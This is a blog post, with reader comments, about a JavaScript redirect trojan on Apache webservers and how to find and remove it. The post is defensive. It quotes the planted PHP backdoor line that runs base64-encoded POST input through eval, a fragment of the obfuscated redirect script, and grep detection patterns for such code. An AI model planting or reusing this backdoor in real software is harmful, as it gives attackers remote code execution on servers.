Über den Author / Internet / JS:Redirect Trojan on Webserver (keygenguru) (EN)

JS:Redirect Trojan on Webserver (keygenguru) (EN)

~4 Min. Lesezeit

Dieser Artikel kann hier auf Deutsch gelesen werden

There is a special trojan on the web, which affects webservers. The server itself has no virus and no things installed that causes this problem… No AntiVirus solution can found him, but a special Redirect to a Website with Viruses occures.

The Webpages working complete as they should, but sometimes the user are redirected to this site. The content of the webpage has no affected code in it.

There for this problem cannot easly found. On the redirected Webpage the Users sees a Hoax in case of a Flash based Video and diffrent Messages about infections on the local client.

At the End, the User gets a Popup that he must download the Setup.exe to clean his PC. In this File, a trojan and more viruses are included.
As long as this file will not be downloaded, there is NO infection on the local client. User where had downloaded and installed that file, should run a AntiVirus check.

That problem occures only in the Internet Explorer. Other browsers like Safari and Firefox are ignoring this redirect and show a white empty page.

IT seams, that trojan on the master webserver infects all domains on this server and he will not redirect every time, only a few times…
At the end, the solution and the reason is very easy, but to find the trojan is very complex without any information where to search.

No AntiVirus scanner will find the trojan and the reason therefor is very easy again (more later).

The Apache2 Server is running with Child’s, which are handle the load on the server. Normally apache2 is generating 20 Child’s by his own and give every chield the same amount of work.
Thats the normal way of Apache.

The trojan is in a PHP File, which will be uploaded to the webserver as FTP (normal with a hacked account), afterwards a special command throught this PHP file will create a file called apache2 in the /tmp directory. This file will be startet as the same user/group as the apache service.

After the start of this file, it will be deletet, that nobody can find it. But in the memory, the progress is running. If somebody is looking in the process list, there is only a few „./apache2“ are running. Which is a right Child and which is a trojan is not visible.

If a user is connecting to a right Apache progress, he will see the webpage, if a user is going to the „trojan“ Chield, then he will forwarded to a site like this one (shortened):

206f
<script type=“text/javascript“ language=“javascript“> var jodmtbm=new Date( ); jodmtbm.setTime(jodmtbm.getTime( )+12*60*60*1000); document.cookie=“\x6e_s\x65ss_i\x64=bf4edc3aa95c\x3285\x619a315669\x6333e25ed“+“; path=/\x3b ex\x70\151\x72es=“+jodmtbm.toGMTString( ); </script>
<script>document.write(String.fromCharCode(59+1,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script>

Complete Code in here: Link to the TXT File or older version virustext2

This code will forward the User on a other Site.

If google detects this malware code, the page will be blacklistet and users will see a screen like this one:


Cleaning:

To clean the trojan from server, please stop all Apache2 processes with following command:

/etc/init.d/apache2 stop

With this script you can search for the trojan in all PHP files (Download Link). Please change the coresponding search mask in the script if nessessary (if you need help, please contact me):

PAYLOAD=’_POST\[„p“\]‘
#PAYLOAD=’eval *\( *base64_decode‘ # Most evil is behind this snippet. BUT! WordPress also produces this code!
#PAYLOAD=“e[^a-z]*v[^a-z]*a[^a-z]*l[^a-z]*b[^a-z]*a[^a-z]*s[^a-z]*e[^a-z]*6[^a-z]*4[^a-z]*_[^a-z]*d[^a-z]*e[^a-z]*c[^a-z]*o[^a-z]*d[^a-z]*e“

By my webserver, the first snipped was working the best way. No wrong hits.

The infected files look like this one (has many diffrent variants): remove_image.php.txt. Normal, the trojan will attach it themself to any Open Source project files, which case distraction. Normal the bad code is on the first row with many spaces wiped out on the right site of the visible text. If you scroll to the right site, you find this little code:

if(isset($_POST['p']) && $_POST['p']=='dbcf842538df03b0d3a6f94a11480b1b'){eval(base64_decode($_POST['c']));exit;}

With this code, the attacker can send any code to your webserver over the 2 variables „p“ and „c“, and can resend you the complete viruscode any time he wants.
The viruscode itself is nowhere stored on your server, therefor nothing can be found. The code is only a few millisecounds on the /tmp directory.

Normal, this file is completly crap and can be deleted, including the open source part. One little string in one file infects your hole webserver!!

If you have no luck with the upper solution, you can try to find the attacker by the apache logfiles. The entrys are very easly to identify:

112.121.1.37 – – [09/Feb/2010:06:34:33 +0100] „POST /acp/database/lang/remove_message.php HTTP/1.1“ 200 32 „http://www.google.com“ „Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)“

Every Refer which comes to the infected file has „Alexa Toolbar“ in it. That is every time the same. How stupid?? A little search over your logfile and clean the coresponding files and your webserver is clean too.

My search script (for Confixx):

for x in /var/www/web[0-9]*; do
echo „Suche in $x“
cat $x/log/access_log | grep „Alexa Toolbar“
done

Are the files deleted, is the JS:Redirect past and the server clean again.


If you need help or has questions, please do not hesitate to contact me.

About Stefan

avatar
Ein männlicher IT Nerd, durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf.Immer hilfsbereit wenn Probleme zu lösen sind oder das Unmögliche umgesetzt werden sollte.

Weitere interessante Artikel

PHP Trojaner – Wettbewerb

~2 Min. LesezeitIn der Serie der PHP Trojaner gibt es noch viele weitere Möglichkeiten zum …

PHP Trojaner (Teil 4: Codierte Uploader Infektion)

~2 Min. LesezeitNicht jeder PHP Trojaner kann auf den ersten Blick identifiziert werden, was der …

4 Kommentare

  1. avatar

    Hi Stefan,

    Thanks a lot for your article. My website is infected by this very same Trojan, I’m not very ’server-savvy‘ but I have informed my provider and hope he’ll be able to solve this issue asap!

    Anyway -in the meanwhile- I have two questions I was hoping you’re able to answer;
    1) How can a server get infected by this Trojan? I guess its caused by an infected computer making an ftp-connection to the server?? If so, this brings me to the second question;
    2) Once the trojan is removed from the server; how can I be sure I won’t reinfect my server once I use my ftp-program again? In other words, how do I make sure my personal computer is ‚free‘ from this Trojan? As stated in your article, virus scanners aren’t able to spot this trojan?

    Thanks a lot in advance for your additional insights!

  2. avatar

    1). Yes, normally the attacker uploads this php-file with ftp to the webserver and start it.
    2). If you have found the trojan on the webserver, you have several ways to find out how this trojan get on your server.

    One way is to study the logfiles on your server, what is the best way. If you have found the file on the server, DONT delete it, look first on the date/time when it was created. then delete it. After that, go to your ftp/ssh logfile on the server and look which user has uploaded that file on this date/time.
    Change your password of this ftp/ssh account and you shoud be save again.

    This code on your server is a trojan and not, usualy, its a hidden code, thats allow to inject an other trojan. Therefor it will not be found.

    This is then only a redirect trojan, which will send the user to a website containing a virus. This Virus can be found with client scanners! So, if your client is infected, you can clean it with Norton, McAfee, Avira or any other programm..

    Is it your root or virtual server, or are you on a shared system (only webhosting)?

    If you have only webhosting, then it can be that an other customer has this trojan and therefor the hole server has problem, without any infection on your own website. If its your root or virtualserver, you can normaly easy find the trojan in the logs as in the article described.

    If you have any questions or needing help, write me.

  3. avatar

    @Stefan

    Hi Stefan, first of all, thanks a lot for your (enormously swift) reply! I won’t bother you with all that happened last week, but I’ll summarize my current situation and hope you can advise me in how to act next;

    I am in the process of moving all my domains to a new hosting provider, and I have offline copies (on my computer) of all my websites. So, when I have moved my domains to my new hosting provider, I am planning to just upload my (offline) copies onto the new server.

    However, how do I make 100% sure that these ‚offline copies of my websites‘ (on my computer) are not infected in any way by the Trojan you describe in your article?

    I just called my ‚old‘ hosting provider, and he argued that the problem is in some script on my website, and as such, that moving my website to a new hosting provider won’t solve anything. Help? (ps. my MSN is : —MSN Adress removed by Admin—)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

eMail-Benachrichtigung bei weiteren Kommentaren.
Auch möglich: Abo ohne Kommentar.

This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg